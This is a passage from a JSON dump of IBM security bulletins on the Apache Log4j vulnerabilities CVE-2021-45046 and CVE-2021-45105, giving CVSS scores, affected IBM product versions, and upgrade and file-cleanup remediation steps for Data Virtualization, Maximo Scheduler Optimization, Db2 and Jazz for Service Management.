"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-07-12T07:18:10", "id": "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "href": "https://www.ibm.com/support/pages/node/6602951", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:06", "description": "## Summary\n\nThere are vulnerabilities in the version of Apache Log4j that is used by IBM Data Virtualization on Cloud Pak for Data (CVE-2021-45046 and CVE-2021-45105) which is used for logging. The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **DV Version(s) \n**| \n\n**CPD ****Version(s) ** \n \n---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9 \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.3| 4.0 Refresh 4 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Affected Product(s)**| **DV Version(s) **| **CPD Version(s) **| **Fixes** \n---|---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9\n\n| \n\nApply patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3| \n\nUpdate to version 1.7.5 (DV) /\n\n4.0 Refresh 5 (CPD) \n \nIBM Data 
Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.3| 4.0 Refresh 4| \n\nUpdate to version 1.7.5 (DV) /\n\n4.0 Refresh 5 (CPD) \n \n**You must update the Cloud Pak for Data platform to version 4.0 Refresh 5 to install the fix for Data Virtualization.**\n\nTo update Cloud Pak for Data platform to 4.0 Refresh 5, see the following links:\n\n * [Updating Data Virtualization from Version 3.5](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v35.html> \"Updating Data Virtualization from Version 3.5\" )\n * [Updating Data Virtualization from Version 4.0.1 or later](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v4.html>)\n\n**The following procedure covers the steps after installing the fix for Data Virtualization**.\n\n 1. Run the following steps from the Data Virtualization head pod to manually remove unnecessary files from your updated Data Virtualization instance. These include files that contained old log4j binaries. Not all of the files might be present if you previously installed other log4j fixes. \n\n 1. Log in to the Data Virtualization head pod. \n \n oc rsh c-db2u-dv-db2u-0\n\n 2. Switch to the db2inst1 user. \n \n su - db2inst1\n\n 3. Remove unnecessary JAR files. 
\n \n rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar\"\n\n 4. Remove unnecessary ZIP and TAR files. \n \n rm -rf /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7*.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7*.zip\n\n 5. Copy the latest TAR file. \n \n cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.5_*.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config\n\n 6. Copy the latest ZIP file. \n \n cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.5_*.zip /mnt/PV/versioned/uc_dsserver_shared/config\n\n 2. 
Complete the following steps to manually restart head and worker pods to complete applying the fix. This manual restart can be performed by running the following command: \n\n 1. Wait for the Data Virtualization hurricane pod to start up successfully.\n 2. Run the following commands to restart the Data Virtualization head and worker pods: \n \n current_replicas=$(oc get sts c-db2u-dv-db2u -o jsonpath=\"{.spec.replicas}\"); oc scale sts c-db2u-dv-db2u --replicas=0; sleep 3m; oc scale sts c-db2u-dv-db2u --replicas=$current_replicas\n\n 3. If you see the following error message, restart the Data Virtualization hurricane pod and then repeat step 2. b) \n \n ERR api/pkg/cli/sideload/load.go:73 error=\"file is the wrong size: 154274816, expected: 154143232\\n\"\n\n 3. Data Virtualization is now ready to use.\n\n**Note**_:_\n\n_If you run a security vulnerability scanning tool on the Docker images, you might find that some of the affected packages at the affected version are still present on it. 
_\n\n_Those packages have been modified according to guidance provided by the Apache Log4j development team so that they are no longer vulnerable._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n24 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSK1AQ\",\"label\":\"IBM Data Virtualization\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF043\",\"label\":\"Red Hat\"},{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.3.0\\/2.5.0, 1.4.1\\/3.0.1, 1.5.0\\/3.5, 1.5.0\\/3.5 Refresh 1 - 9, 1.7.1 - 1.7.3\\/4.0 Refresh 1 - 3, 1.7.3\\/4.0 Refresh 4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSK1AQ\",\"label\":\"IBM Data Virtualization\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF043\",\"label\":\"Red Hat\"},{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.3.0\\/2.5.0, 1.4.1\\/3.0.1, 1.5.0\\/3.5, 1.5.0\\/3.5 Refresh 1 - 9, 1.7.1 - 1.7.3\\/4.0 Refresh 1 - 3, 1.7.3\\/4.0 Refresh 4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-29T00:31:33", "type": "ibm", "title": "Security Bulletin: IBM Data Virtualization on Cloud 
Pak for Data is vulnerable to arbitrary code execution (CVE-2021-45046) and denial of service (CVE-2021-45105) due to Apache Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-29T00:31:33", "id": "185EAAB4DDC8472DF44603A1F8F5361C61E9CD92D640BE3D1EC6D31AE959C4F0", "href": "https://www.ibm.com/support/pages/node/6551744", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-19T13:26:25", "description": "## Summary\n\nFor the 8.0.0 version of MSO, which is distributed as part of the MAS catalog here are the instructions to move to the 8.0.3 version to get log4j 2.17.1 Apache Log4j - [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15) \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo Scheduler Optimization| All \n \n\n\n## Remediation/Fixes\n\n**How to manually get Maximo Scheduler Optimization 8.0.0 (MSO) updated to Apache log4j 2.17.1 **\n\n**IBM strongly suggests the following update: \n**\n\nUpdate the Maximo Scheduler Optimization 8.0.0 installed on Maximo Application Suite (MAS) to Version 8.0.3 of MSO.\n\n### Update **Maximo Scheduler Optimization** application\n\nWhen new versions of applications are available, you can update the deployed applications.\n\nTo update an application:\n\n 1. From the Suite Administration Applications pane, select the Addon tab and find the Maximo Scheduler Optimization application that you want to update.\n 2. 
On the application summary page, confirm the 8.0.3 or later version, then click **Update**.\n\n**Product(s)**| **Version(s)**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Maximo Scheduler Optimization | 8.0| \n\nUpdate [8.0](<https://www.ibm.com/docs/en/mas86/8.6.0?topic=ons-maximo-scheduler-optimization> \"8.0\" ) and follow [instructions](<https://www.ibm.com/docs/en/mas87/8.7.0?topic=ons-maximo-scheduler-optimization> \"instructions\" ) to get the 8.0.3 or later version \n \n## Workarounds and Mitigations\n\nFor MSO version 8, update to the latest available version, 8.0.3.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nN/A\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nN/A\n\n## Change History\n\n30 Sep 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. 
Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSLKT6\",\"label\":\"Maximo Asset Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"8.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-19T14:06:26", "type": "ibm", "title": "Security Bulletin: Apache log4j security vulnerability as it relates to IBM Maximo Scheduler Optimization - Apache Log4j - [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-10-19T14:06:26", "id": "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "href": 
"https://www.ibm.com/support/pages/node/6830617", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:17", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae On Openshift and IBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data are affected by multiple vulnerabilities (CVE-2021-45105 and CVE-2021-45046). This library is used by the Db2 Federation and Db2 Graph feature as part of its logging infrastructure. The fix includes Apache Log4j v2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAll platforms of the following IBM\u00ae Db2\u00ae On Openshift fix pack releases and IBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data refresh levels are affected:\n\nRelease| Version \n---|--- \nIBM\u00ae Db2\u00ae On Openshift| \n\nv11.5.5.0 - v11.5.5.0-cn4 \nv11.5.5.1 - v11.5.5.1-cn3 \nv11.5.6.0 - v11.5.6.0-cn5 \nv11.5.7.0 \n \nIBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data| \n\nv3.5 through refresh 9 \nv4.0 through refresh 4 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest IBM Db2 On Openshift or the IBM Db2 and Db2 Warehouse on Cloud Pak for Data refresh release containing the fix for this issue. These builds are available based on the most recent fixpack level of the V11.5.7 release and the Cloud Pak for Data v3.5 refresh 9, 4.0 refresh 4 release. 
They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nPlease note: If the affected release is any refresh level of Cloud Pak for Data 3.5, it is strongly recommended to upgrade to Cloud Pak for Data 4.0, then apply the latest refresh release \n\n\nProduct| Fixed in Fix Pack| Instructions \n---|---|--- \nIBM\u00ae Db2\u00ae On Openshift| \n\nv11.5.5.1-cn4\n\nv11.5.7.0-cn1\n\n| \n\n<https://www.ibm.com/docs/en/db2/11.5?topic=1156-upgrading-updating> \n \nIBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data| \n\nv3.5 refresh 10\n\nv4.0 refresh 5\n\n| \n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=upgrading> \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n26 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSCJDQ\",\"label\":\"IBM Db2 Warehouse\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All versions of 11.5, All versions of Cloud Pak for Data\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-26T15:01:15", "type": "ibm", "title": "Security Bulletin:IBM\u00ae Db2\u00ae On Openshift and IBM\u00ae Db2\u00ae and Db2 Warehouse\u00ae on Cloud Pak for Data is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-26T15:01:15", "id": "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "href": "https://www.ibm.com/support/pages/node/6551118", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:37:10", "description": "## Summary\n\nBased on current information and analysis, IBM Jazz for Service Management does not use the Apache log4j-core library, which is vulnerable to CVE-2021-45105 and CVE-2021-45046. However, IBM Jazz for Service Management may be impacted because old versions of Log4j-1.2-api and Log4j-api are used in the application. \n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nJazz for Service Management | 1.1.3 \n \n## Remediation/Fixes\n\n**Affected JazzSM Version** | **Recommended Fix.** \n---|--- \nJazz for Service Management versions 1.1.3 - 1.1.3.6 | \n\n**Note:** 1.1.3.13-TIV-JazzSM-DASH-iFix-0002 has been superseded by [1.1.3.13-TIV-JazzSM-DASH-iFix-0003](<https://www.ibm.com/support/pages/node/6536710> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" )\n\n1\\. 
